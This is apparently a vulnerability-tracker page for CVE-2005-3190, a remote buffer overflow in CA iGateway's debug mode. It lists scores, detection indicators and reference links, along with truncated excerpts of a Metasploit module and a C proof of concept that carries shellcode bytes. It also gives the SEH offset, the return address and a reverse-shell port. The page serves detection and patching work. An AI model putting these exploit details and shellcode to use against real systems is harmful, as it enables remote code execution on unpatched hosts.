CVE-2005-3190
published 2005-10-13CVE-2005-3190: Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary…
PriorityP262high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
65.61%
99.2th percentile
Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | igateway | — | — |
| broadcom | igateway | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xdd\x10\x12\x12
bytes↗
\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d\xf7\x83\xeb\xfc\xe2\xf4
- →Detect exploit attempts by monitoring for oversized HTTP GET requests (>1000 bytes in the request path) to TCP port 5250 on iGateway services. ↗
- →Banner-check fingerprint: a vulnerable iGateway instance responds to HEAD / HTTP/1.0 with the string 'GET and POST methods are the only methods supported at this time'. ↗
- →The Metasploit module uses SEH-based exploitation with a return address of 0x120bd9c4 (pop/pop/ret in xerces-c_2_1_0.dll); presence of this address in network traffic targeting port 5250 is a strong exploit indicator. ↗
- →The exploit payload opens a reverse shell on TCP port 1711; monitor for unexpected listening services on that port post-exploitation. ↗
- →The exploit buffer is offset at byte 1082 for the SEH overwrite; a GET request to port 5250 with ~5000 random alphanumeric bytes in the URI path is characteristic of this attack. ↗
- ·The vulnerability is only exploitable when debug mode is explicitly enabled in igateway.conf (non-default configuration); systems without debug mode enabled are not affected. ↗
- ·The Metasploit module specifies that Ordinal (ws2ord) payloads work best due to bad character restrictions excluding null bytes, newlines, carriage returns, and spaces. ↗
- ·The standalone PoC exploit uses a hardcoded return address for Windows 2000 SP4; a separate (commented-out) address targets Windows XP SP2, indicating target-specific offsets. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2005-3190 CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
---
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When True is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENS
Exploit-DB
CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow
exploitdb·2005-10-10
CVE-2005-3190 CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow
CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow
---
/*ca igateway debug remote overflow -egm [email protected]*/
/*01.30.05*/
#include
#include
#include
#include
const int MAXSIZE = 17110;
char sc[] = //metasploit
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e
Metasploit
CA iTechnology iGateway Debug Mode Buffer Overflow
metasploit
CA iTechnology iGateway Debug Mode Buffer Overflow
CA iTechnology iGateway Debug Mode Buffer Overflow
This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When True is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.htmlhttp://secunia.com/advisories/17085http://securityreason.com/securityalert/86http://securitytracker.com/id?1015045http://www.osvdb.org/19920http://www.securityfocus.com/bid/15025http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485https://exchange.xforce.ibmcloud.com/vulnerabilities/22560http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.htmlhttp://secunia.com/advisories/17085http://securityreason.com/securityalert/86http://securitytracker.com/id?1015045http://www.osvdb.org/19920http://www.securityfocus.com/bid/15025http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485https://exchange.xforce.ibmcloud.com/vulnerabilities/22560
2005-10-13
Published